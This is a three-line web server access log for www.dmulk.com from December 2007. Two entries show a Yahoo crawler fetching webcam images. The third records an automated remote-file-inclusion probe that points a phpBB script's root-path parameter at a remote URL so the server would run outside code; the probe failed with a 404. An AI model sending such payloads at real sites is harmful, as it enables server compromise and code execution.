68.142.212.185 - - [24/Dec/2007:01:34:34 -0800] "GET /retreat1/webcam/retreat1_00841.jpg HTTP/1.0" 200 15250 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:01:34:54 -0800] "GET /retreat1/webcam/retreat1_00627.jpg HTTP/1.0" 200 40229 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
66.98.148.56 - - [24/Dec/2007:01:34:58 -0800] "GET /logs/access_071216.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.gulzarii.com/myfolder/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
